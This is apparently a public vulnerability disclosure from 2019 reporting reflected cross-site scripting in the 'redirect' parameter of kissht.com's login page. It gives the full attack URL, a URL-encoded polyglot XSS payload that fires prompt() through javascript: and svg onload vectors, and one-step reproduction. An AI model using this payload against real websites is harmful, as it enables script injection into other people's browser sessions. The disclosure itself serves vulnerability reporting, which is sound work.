Bug on Kissht - Vulnerability Name : Cross Site Scripting - (on mobile opt entering page) Vulnerable URL : https://kissht.com/login?redirect=%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e Vulnerable Parameter : redirect Vulnerable Payload : %22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a'%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e How to reproduce this issue: 1. Visit the url it will give an XSS popup. https://kissht.com/login?redirect=%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e POC : Screenshort can be found in the attachment.



Domain: https://kissht.com/
Tweet Share

Reported on kissht.com

Total # of issues reported = 3

Reported by mrhacker14012001

Total Points of mrhacker14012001 = 13

Browser Version: 60.0

Operating System: Linux

OS Version:

Bug Type: Security
Status: open
Added on: May 16, 2019, 2:54 a.m.

Screenshot:



OCR Results:

OCR not installed

Comments:

No comment added yet. Be the first to comment!